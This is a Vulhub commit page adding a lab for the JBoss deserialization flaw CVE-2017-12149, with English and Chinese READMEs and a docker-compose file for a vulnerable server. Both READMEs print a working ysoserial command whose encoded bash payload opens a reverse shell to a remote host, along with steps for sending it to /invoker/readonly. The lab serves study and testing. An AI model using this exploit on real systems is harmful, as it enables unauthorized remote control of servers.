first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
54
jboss/CVE-2017-12149/README.md
Normal file
54
jboss/CVE-2017-12149/README.md
Normal file
@@ -0,0 +1,54 @@
|
||||
# JBoss 5.x/6.x Deserialization Remote Code Execution (CVE-2017-12149)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Red Hat JBoss Application Server is a JavaEE-based open source application server. In JBoss AS 5.x/6.x, the ReadOnlyAccessFilter filter in the HttpInvoker component attempts to deserialize data streams from clients without performing any security checks, resulting in a deserialization vulnerability.
|
||||
|
||||
References:
|
||||
|
||||
- https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg
|
||||
- https://access.redhat.com/security/cve/cve-2017-12149
|
||||
|
||||
## Environment Setup
|
||||
|
||||
Run the following command to start the JBoss AS 6.1.0:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
The initial setup will take 1-3 minutes. After initialization is complete, visit `http://your-ip:8080/` to see the JBoss default page.
|
||||
|
||||
## Vulnerability Reproduce
|
||||
|
||||
The vulnerability exists in the `/invoker/readonly` request, where the server performs Java deserialization on the POST content submitted by users:
|
||||
|
||||

|
||||
|
||||
Therefore, we can use conventional Java deserialization vulnerability testing methods to reproduce this vulnerability.
|
||||
|
||||
### Generate reverse shell payload
|
||||
|
||||
We use bash for the reverse shell, but since `Runtime.getRuntime().exec()` cannot use pipe operators and other bash methods directly, we need to encode it first.
|
||||
|
||||
Tool: http://www.jackson-t.ca/runtime-exec-payloads.html
|
||||
|
||||

|
||||
|
||||
### Generate serialized data
|
||||
|
||||
We use [ysoserial](https://github.com/frohoff/ysoserial) to generate the serialized data. Since Vulhub uses a newer version of Java, we choose the CommonsCollections5 gadget:
|
||||
|
||||
```
|
||||
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
|
||||
```
|
||||
|
||||
### Send the POC
|
||||
|
||||
The generated POC is poc.ser. Simply send this file as the POST Body to /invoker/readonly:
|
||||
|
||||

|
||||
|
||||
Successfully obtained reverse shell:
|
||||
|
||||

|
52
jboss/CVE-2017-12149/README.zh-cn.md
Normal file
52
jboss/CVE-2017-12149/README.zh-cn.md
Normal file
@@ -0,0 +1,52 @@
|
||||
# JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
|
||||
|
||||
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 5.x/6.x中,HttpInvoker组件中的ReadOnlyAccessFilter过滤器在未进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
|
||||
|
||||
参考:
|
||||
|
||||
- https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg
|
||||
- https://access.redhat.com/security/cve/cve-2017-12149
|
||||
|
||||
## 测试环境
|
||||
|
||||
执行如下命令启动JBoss AS 6.1.0:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
首次执行时会有1~3分钟时间初始化,初始化完成后访问`http://your-ip:8080/`即可看到JBoss默认页面。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
该漏洞出现在`/invoker/readonly`请求中,服务器将用户提交的POST内容进行了Java反序列化:
|
||||
|
||||

|
||||
|
||||
所以,我们用常规Java反序列化漏洞测试方法来复现该漏洞。
|
||||
|
||||
### 编写反弹shell的命令
|
||||
|
||||
我们使用bash来反弹shell,但由于`Runtime.getRuntime().exec()`中不能使用管道符等bash需要的方法,我们需要用进行一次编码。
|
||||
|
||||
工具:http://www.jackson-t.ca/runtime-exec-payloads.html
|
||||
|
||||

|
||||
|
||||
### 序列化数据生成
|
||||
|
||||
使用[ysoserial](https://github.com/frohoff/ysoserial)来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5:
|
||||
|
||||
```
|
||||
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
|
||||
```
|
||||
|
||||
### 发送POC
|
||||
|
||||
生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可:
|
||||
|
||||

|
||||
|
||||
成功反弹shell:
|
||||
|
||||

|
6
jboss/CVE-2017-12149/docker-compose.yml
Normal file
6
jboss/CVE-2017-12149/docker-compose.yml
Normal file
@@ -0,0 +1,6 @@
|
||||
services:
|
||||
jboss:
|
||||
image: vulhub/jboss:as-6.1.0
|
||||
ports:
|
||||
- "9990:9990"
|
||||
- "8080:8080"
|
BIN
jboss/CVE-2017-12149/img/1.png
Normal file
BIN
jboss/CVE-2017-12149/img/1.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 54 KiB |
BIN
jboss/CVE-2017-12149/img/2.png
Normal file
BIN
jboss/CVE-2017-12149/img/2.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 4.9 KiB |
BIN
jboss/CVE-2017-12149/img/3.png
Normal file
BIN
jboss/CVE-2017-12149/img/3.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 135 KiB |
BIN
jboss/CVE-2017-12149/img/4.png
Normal file
BIN
jboss/CVE-2017-12149/img/4.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 4.4 KiB |
Reference in New Issue
Block a user